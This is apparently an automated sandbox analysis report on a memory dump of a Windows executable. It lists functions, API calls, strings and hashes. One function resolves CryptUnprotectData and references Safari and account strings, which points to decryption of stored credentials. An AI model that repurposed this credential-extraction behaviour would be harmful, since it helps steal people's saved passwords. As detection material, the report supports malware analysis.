Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6

Part of subcall function 00407DF4: GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
Part of subcall function 00407DF4: _snwprintf.MSVCRT ref: 00407E35
Part of subcall function 00407DF4: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
String ID:
API String ID: 1161345128-0
Opcode ID: 3d3b21ef697afd0bdb833f204540dd718a0a6addb83a3789607b508d28bd4cbe
Instruction ID: 75199abba107ca30350ead5857dca6b94cadfdfaeaa302ec2f3d27d1e62cce92
Opcode Fuzzy Hash: 3d3b21ef697afd0bdb833f204540dd718a0a6addb83a3789607b508d28bd4cbe
Instruction Fuzzy Hash: BD417F35E00604EBCB219FA9C885A5EB7B6AF54714F20406FF446AB2D1CB389E44DA99

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE76, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040FEC3

Strings

/stext, xrefs: 0040FEBE

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp
String ID: /stext
API String ID: 2081463915-3817206916
Opcode ID: a01bfb8d808dbe57cbee4fd70ed2a4dbf1f3eb0a587578e83f1d012f6d402b9a
Instruction ID: 2161babe09ea1c109a016804ff5c091d56ac672142073ac0305c405afa28cd18
Opcode Fuzzy Hash: a01bfb8d808dbe57cbee4fd70ed2a4dbf1f3eb0a587578e83f1d012f6d402b9a
Instruction Fuzzy Hash: 37216074B00205AFD714EFAAC881A9DB7A9FF84304F1001BFA415A7782DB79AD148B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041829C, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004182A7
GetSystemInfo.KERNELBASE(00453D60,?,00000000,00442D20,?,?,?), ref: 004182B0

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoSystemmemset
String ID:
API String ID: 3558857096-0
Opcode ID: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
Instruction ID: 3c0be6fe3b5a6ffc89f5b68e380a6edd79d3b36df5ca7f17532ee32b6b8f0e73
Opcode Fuzzy Hash: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
Instruction Fuzzy Hash: 86E09235E01A242BE7117F767C07BDB26948F8A38AF04407BF904DA253EA6CCD414ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00414C1D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414C2C

Strings

failed to allocate %u bytes of memory, xrefs: 00414C46

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: malloc
String ID: failed to allocate %u bytes of memory
API String ID: 2803490479-1168259600
Opcode ID: 37a0e16a31e73fb3f1329956b653d3eb145f9cbc4939c84207ade25bbdcda1f4
Instruction ID: cc16955a0d14ca8776a7aa5b229d79c98c920de21d1adc6b7d8c4ece6c284845
Opcode Fuzzy Hash: 37a0e16a31e73fb3f1329956b653d3eb145f9cbc4939c84207ade25bbdcda1f4
Instruction Fuzzy Hash: 64E020B7F0361267C2004615DC0168777959FD132171B0637F95CD3680D63CD84587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00416ED2, Relevance: 3.0, APIs: 2, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 00416EEB
FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,004536AC,0041753F,00000008,00000000,00000000,?,004176FC,?,00000000), ref: 00416EF4

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ChangeCloseFindNotificationSleep
String ID:
API String ID: 1821831730-0
Opcode ID: cc2e2d56278e834b5826f7bb8f80f5f4d654d385e6d95c8a2fc1f4074e09f098
Instruction ID: ddbdeb719d62bbcd0ae2c24f8bc232808eb7cee6ac061654c4d164212cdc0068
Opcode Fuzzy Hash: cc2e2d56278e834b5826f7bb8f80f5f4d654d385e6d95c8a2fc1f4074e09f098
Instruction Fuzzy Hash: 35E0C23F11071A9FDB0097BCDC90AD773D8EF56338726433AF662C61A0CA65D8828654

Uniqueness

Uniqueness Score: -1.00%

Function 0041B556, Relevance: 2.7, APIs: 2, Instructions: 195COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041B6FA
memcmp.MSVCRT ref: 0041B70C

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcmpmemset
String ID:
API String ID: 1065087418-0
Opcode ID: 9b44e04d39c850c09dfc470b21759ac07039072516198818df3f324f61dd621a
Instruction ID: 1efd5175aaeb232b83b4fa12f0066e98a2b2c589ef3b7fe000d2c80dadf29316
Opcode Fuzzy Hash: 9b44e04d39c850c09dfc470b21759ac07039072516198818df3f324f61dd621a
Instruction Fuzzy Hash: AF617C71A01245EFDB10EFA485C06EEB7B4FB54308F14846FE11497281E738AED59B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041857E, Relevance: 2.6, APIs: 2, Instructions: 132COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00418670
memset.MSVCRT ref: 00418687

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 1d4e29f100636c82fc329f94a374f4d18a69853f661fcb673019947e7cc7e1db
Instruction ID: 158bf94f573ecacca79ccaf447c09fb498ee4e42fef6769a8b2fd70c0d8b82a4
Opcode Fuzzy Hash: 1d4e29f100636c82fc329f94a374f4d18a69853f661fcb673019947e7cc7e1db
Instruction Fuzzy Hash: 0D417A72500602EFCB309F64D9848ABB7F6FB14314710492FE54AC7660EB38E9D5CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004109C4, Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00410A52: memset.MSVCRT ref: 00410A9A
Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB1
Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB9
Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B14
Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B22

Part of subcall function 004086BA: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00410A06,00000000,?,00000000,?,00000000), ref: 004086D2
Part of subcall function 004086BA: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004086E6
Part of subcall function 004086BA: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00411ED6), ref: 004086EF

CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 00410A10

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$File$Time$CloseCompareCreateHandlememset
String ID:
API String ID: 4204647287-0
Opcode ID: 48bb59a4ca4dbe6461cecc32442f889d9791df2e0bee5e493ae7e30c1f2a8d06
Instruction ID: e327927a43c347593f183825775ae13c5bf460ea87da421573a566f28fb83fb7
Opcode Fuzzy Hash: 48bb59a4ca4dbe6461cecc32442f889d9791df2e0bee5e493ae7e30c1f2a8d06
Instruction Fuzzy Hash: 7A117076C00218EBCF11EBA5DA419DEB7B9EF44300F10006BE441F3281EA749B84CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00413E1E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 00413E45

Part of subcall function 00413CAE: memset.MSVCRT ref: 00413CCD
Part of subcall function 00413CAE: _itow.MSVCRT ref: 00413CE4
Part of subcall function 00413CAE: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00413CF3

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: 1f1dca71c13544e9ae3cf3bf1a8489d4a1747e82e79b44c055a72dbc52dfabd8
Instruction ID: 5d66eace87880ca3e294b7f0e570a8e3be22b6ae62b10c3d44e19be24f2def2d
Opcode Fuzzy Hash: 1f1dca71c13544e9ae3cf3bf1a8489d4a1747e82e79b44c055a72dbc52dfabd8
Instruction Fuzzy Hash: 89E0B632000249ABDF126F91EC01AAA7F66FF14315F148459FD6C14121D33295B0AF84

Uniqueness

Uniqueness Score: -1.00%

Function 00444425, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,00411BC7,?,?,00403557,?), ref: 00444436

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 323128d68ef13db0835413ed71cea84c0f3745e98266a12d00a9647ca1b2ecc2
Instruction ID: 39ddfc5443798b4b2f471bdaff8db486b4a9363c7739a8bb917076c50ef601e7
Opcode Fuzzy Hash: 323128d68ef13db0835413ed71cea84c0f3745e98266a12d00a9647ca1b2ecc2
Instruction Fuzzy Hash: 92E0F6B5900B008F97308F2BE944506FBF8BEE46103108A1F91AAC2A21C3B4A5498F94

Uniqueness

Uniqueness Score: -1.00%

Function 004135FF, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 00413627: LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004134F7,00000104,004134F7,00000000,?), ref: 0041361E

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$FileLibraryLoadModuleName
String ID:
API String ID: 3821362017-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 7bbd5afd8370dadb00360ee8d7667c1b04e34d2617d736b2e99a938255987c13
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 7CD022312043007BD231EE708C00FCBB3E8BF44711F028C1AB190E2280C3B8C9409308

Uniqueness

Uniqueness Score: -1.00%

Function 00413401, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,00406DBF,?,00000000,?,?,?,?,?,00000000,?), ref: 00413408

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c7bdee4124c4d8ad6a19752b3b65f2382f4191ba04176db7896d06b676d0d792
Instruction ID: 53121aa1ed69e67302caa1b874726051d72530908054280e128cb363a29a4499
Opcode Fuzzy Hash: c7bdee4124c4d8ad6a19752b3b65f2382f4191ba04176db7896d06b676d0d792
Instruction Fuzzy Hash: 51D0C9324005229BDB00AF26EC45B857368EF00351B150025E800BB492D738BEA28ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0040899C, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0040DDA6,00000000,0044AF64,00000002,?,0040FF40,00000000,00000000,?), ref: 004089B3

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d35f175962138f83e7c21fa835ff5d24f1ea1e816d258fa8209e89adc734a4dd
Instruction ID: 44b36b217b32540387e14a2368d622af177610148a3238ec1afc6282a592e5c5
Opcode Fuzzy Hash: d35f175962138f83e7c21fa835ff5d24f1ea1e816d258fa8209e89adc734a4dd
Instruction Fuzzy Hash: 64D0C93551020DFFDF01CF80DD06FDE7B7DEB04359F104054BA0495060C7B59A10AB54

Uniqueness

Uniqueness Score: -1.00%

Function 00407D7B, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8208bc6edc164ae96c82fd775a2941fa10469c8b98cafac607abb3fbe20ee729
Instruction ID: 729bcb02508df23f9412a42fb8e8b3188fed1bd1f0cd2b7b0f8edc4fa6246a8f
Opcode Fuzzy Hash: 8208bc6edc164ae96c82fd775a2941fa10469c8b98cafac607abb3fbe20ee729
Instruction Fuzzy Hash: E3C092B4240201BEFF228B10ED15F36295CD740700F2044247E00E80E0D1A04E108924

Uniqueness

Uniqueness Score: -1.00%

Function 00407D94, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e4fb0def6ce664a06b79152cf56c2ddeab2622e766aaf14104048769dc5d2c9c
Instruction ID: edb615435fe3ce855b8554d9524e6f242ae4b45eb81851bd3d2393cb7dc29c83
Opcode Fuzzy Hash: e4fb0def6ce664a06b79152cf56c2ddeab2622e766aaf14104048769dc5d2c9c
Instruction Fuzzy Hash: 67C012F43503017FFF208B10AD0AF37395DD780700F1084207F00E80E1D2E14C008924

Uniqueness

Uniqueness Score: -1.00%

Function 00409552, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 00409559

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: f17d17a82e7eff4c361624d86b7f249207a7f80e03ad9ec9b6aa2e80ce8aa672
Instruction ID: 664dc763c5da3aaab367392b47211da9bee634dc4adcd4213ebe75a48c3d30fa
Opcode Fuzzy Hash: f17d17a82e7eff4c361624d86b7f249207a7f80e03ad9ec9b6aa2e80ce8aa672
Instruction Fuzzy Hash: 6EC09BB29127015BF7309F66C40471373D85F50767F314C5DA4D1964C1DB7CD5408514

Uniqueness

Uniqueness Score: -1.00%

Function 00414266, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

EnumResourceNamesW.KERNELBASE(?,?,004141E0,00000000), ref: 00414275

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 10e677fbce6fd90f0b0892a272ce9856b781f2edb2e34da2307d6f8996e91fc3
Instruction ID: 894f21907dab3ca3b917dc931ff3d8bd940b81db11264512214ff9c0d0df685d
Opcode Fuzzy Hash: 10e677fbce6fd90f0b0892a272ce9856b781f2edb2e34da2307d6f8996e91fc3
Instruction Fuzzy Hash: 23C09B35654341A7C7029F109C0DF1E7EA5BB95705F504C29B151940A0C75251549609

Uniqueness

Uniqueness Score: -1.00%

Function 00409428, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,0040933E,?,00000000,?,004127ED,*.*,?), ref: 00409432

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 0ad1f9dc815212ba49355cece8123c874f6c433bcb3a33917fc8ecdda60dda50
Instruction ID: 3bd61d94ea2d0ebbf22c21a92135ad1df5e9ea430364887b997a0a3dbe6c7a02
Opcode Fuzzy Hash: 0ad1f9dc815212ba49355cece8123c874f6c433bcb3a33917fc8ecdda60dda50
Instruction Fuzzy Hash: 3EC048345109018BD6289F38986A52A77A0AA5A3303A44F6CA0F2920E2E73888428A04

Uniqueness

Uniqueness Score: -1.00%

Function 00413ACB, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
Instruction ID: 95e4874612f61a4c2f5820174f699a9a2e50adc9900ffd5901b80c85968e45e3
Opcode Fuzzy Hash: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
Instruction Fuzzy Hash: 7BC04C35510B118BEF218B12C989793B3E4AF00757F40C818949685851D77CE454CE18

Uniqueness

Uniqueness Score: -1.00%

Function 00408250, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
Instruction ID: 7aa4b53cbdd50d27f0544b0d73f3b09e9b9e978b4a3a64aa4ec168f40bbc8e5c
Opcode Fuzzy Hash: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
Instruction Fuzzy Hash: 89B012B92104005BCF0807349C4904D36505F456317300B3CB033C01F0D730CCA0BA00

Uniqueness

Uniqueness Score: -1.00%

Function 00413E4F, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
Instruction ID: 06f107d5783c69a41ddb44c60f44fa238db6365feab173ebf779541cd7ebc08f
Opcode Fuzzy Hash: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
Instruction Fuzzy Hash: E1C09B39544301BFDF114F40FE05F09BB61AB84F05F004414B344240B282714414EB57

Uniqueness

Uniqueness Score: -1.00%

Function 0041B76D, Relevance: 1.3, APIs: 1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f77371c8789c3266b9f1932ef178477fe063e167a465118b7ddcb6402bacfed
Instruction ID: fa567e0f167378dcabf243c4c44df542d601d1aca3ea04bf4c0b19c361688719
Opcode Fuzzy Hash: 6f77371c8789c3266b9f1932ef178477fe063e167a465118b7ddcb6402bacfed
Instruction Fuzzy Hash: 1A317C31901216EFDF14AF25D9817DA73A4FF00B55F14412BF825AB280DB38EDA08BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00418A75, Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00418ABB

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 699d931d5904c81c8ecf6c74ae7279b432135137ffc4fc0b9ee73e3934815af2
Instruction ID: e8b0848d424c06527b7c98d9968769e486fd61e3c9cab8ecaf7e7731b424246b
Opcode Fuzzy Hash: 699d931d5904c81c8ecf6c74ae7279b432135137ffc4fc0b9ee73e3934815af2
Instruction Fuzzy Hash: 03215CB1A00604AFDB10DF69C981A9AB7F5FF89304F24466EE44ACB351DB75ED818A08

Uniqueness

Uniqueness Score: -1.00%

Function 00409539, Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559

??2@YAPAXI@Z.MSVCRT ref: 00409542

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
Instruction ID: 8918756149df837d9eea435be632a3e0a17df07a668273fb2c59ff5331204d46
Opcode Fuzzy Hash: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
Instruction Fuzzy Hash: 2BC08C724182100AD650FF79280205622D49E82320301882FE091E3142D53848014344

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1BF, Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
Instruction ID: def78aeb235da03500d5bf48ca01037dd20a397eb60980b6de46ef9d9da7be76
Opcode Fuzzy Hash: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
Instruction Fuzzy Hash: ACC01272420B018FF7209E11C406722B3E4EF0077BF618C0D909481482C77CD4408A48

Uniqueness

Uniqueness Score: -1.00%

Function 00408F1E, Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
Instruction ID: eebb639015016b4d35185c1cf15d7584ef51e0a9315dec3cbabf5363aa789e86
Opcode Fuzzy Hash: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
Instruction Fuzzy Hash: C5C0127A4107028BF7308F21C509322B2E5AF0072BF708C0D90D081482CB7CD0808A08

Uniqueness

Uniqueness Score: -1.00%

Function 00414C5E, Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00414C62

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
Instruction ID: c34dd2395d73de7fd8324248a47ac8fcc6ed20e97332430ae650d69d176587ff
Opcode Fuzzy Hash: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
Instruction Fuzzy Hash: C8900286455511116C0425756C0760911480892176335074A7032959D1CE1C8150601C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402316, Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 282COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040233E
_wcsicmp.MSVCRT ref: 0040236E
_wcsicmp.MSVCRT ref: 0040239B
_wcsicmp.MSVCRT ref: 004023C8

Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75

memset.MSVCRT ref: 0040276C
memcpy.MSVCRT ref: 004027A1

Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD

memcpy.MSVCRT ref: 004027FD
LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040285B
FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040286A

Strings

t, xrefs: 00402757
y, xrefs: 004025A6
O, xrefs: 0040249D
I, xrefs: 00402530
{, xrefs: 004024C0
>, xrefs: 00402411
@, xrefs: 00402670
2, xrefs: 004026BD
X, xrefs: 00402742
8, xrefs: 004025D7
`, xrefs: 004025DE
=, xrefs: 0040265B
a, xrefs: 0040262A
u, xrefs: 0040251B
com.apple.WebKit2WebProcess, xrefs: 00402793
!, xrefs: 00402662
n, xrefs: 004026CB
q, xrefs: 004025EC
b, xrefs: 00402434
L, xrefs: 00402726
t, xrefs: 00402734
}, xrefs: 0040241F
Path, xrefs: 00402363
H, xrefs: 0040240A
&, xrefs: 00402449
u, xrefs: 0040258A
\, xrefs: 0040264D
0, xrefs: 0040254B
w, xrefs: 00402615
y, xrefs: 0040248F
server, xrefs: 0040232A
n, xrefs: 0040268C
$, xrefs: 004026D9
Data, xrefs: 004023BD
~, xrefs: 004026B6
t, xrefs: 00402669
', xrefs: 00402514
), xrefs: 004026E7
h, xrefs: 004025FA
#, xrefs: 0040270A
&, xrefs: 00402703
^, xrefs: 0040273B
g, xrefs: 00402457
H, xrefs: 00402418
>, xrefs: 00402426
/, xrefs: 0040261C
K, xrefs: 004024DC
K, xrefs: 00402677
S, xrefs: 0040260E
A, xrefs: 004024AB
F, xrefs: 004024E3
com.apple.Safari, xrefs: 00402771
z, xrefs: 0040269A
Account, xrefs: 00402390

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
API String ID: 462158748-1134094380
Opcode ID: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
Instruction ID: 2d0d0591d6411435ed5b4a397348faa82e1f821ad6e98c1f3977ba2ad668a768
Opcode Fuzzy Hash: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
Instruction Fuzzy Hash: FBF1F2218087E9C9DB32C7788C097DEBE655B23324F0443D9D1E87A2D2D7B94B85CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00443A61, Relevance: 66.7, APIs: 23, Strings: 15, Instructions: 152libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00443A8C
wcscpy.MSVCRT ref: 00443AA3
memset.MSVCRT ref: 00443AD6
wcscpy.MSVCRT ref: 00443AEC
wcscat.MSVCRT ref: 00443AFD
wcscpy.MSVCRT ref: 00443B23
